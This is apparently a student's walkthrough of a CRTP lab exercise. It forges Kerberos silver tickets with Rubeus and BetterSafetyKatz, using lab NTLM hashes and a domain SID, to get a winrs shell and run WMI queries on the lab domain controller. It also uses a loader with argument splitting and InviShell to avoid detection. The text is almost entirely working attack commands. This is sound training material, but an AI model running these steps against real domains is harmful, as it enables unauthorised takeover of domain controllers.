CRTP Lab 9

Task 1

Try to get command execution on the domain controller by creating silver ticket for:

  • HTTP

  • WMI

Use the NTLM or AES hash of dcorp-dc to forge and import ticket:

Here, we use Rubeus for HTTP service.

# ArgSplit for "silver"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Since the ticket is imported, we can get a shell as DC and execute commands.

C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

Let's also use SafetyKatz for WMI.

To access WMI, we need two tickets, one for HOST and another for RPCSS.

Let's get one for HOST first:

C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Now for RPCSS:

C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local  /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

We can now check if the tickets are imported using klist

klist

We can now run WMI commands on DC.

# Run InviShell
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Run WMI command on DC
PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName
dcorp-dc

Last updated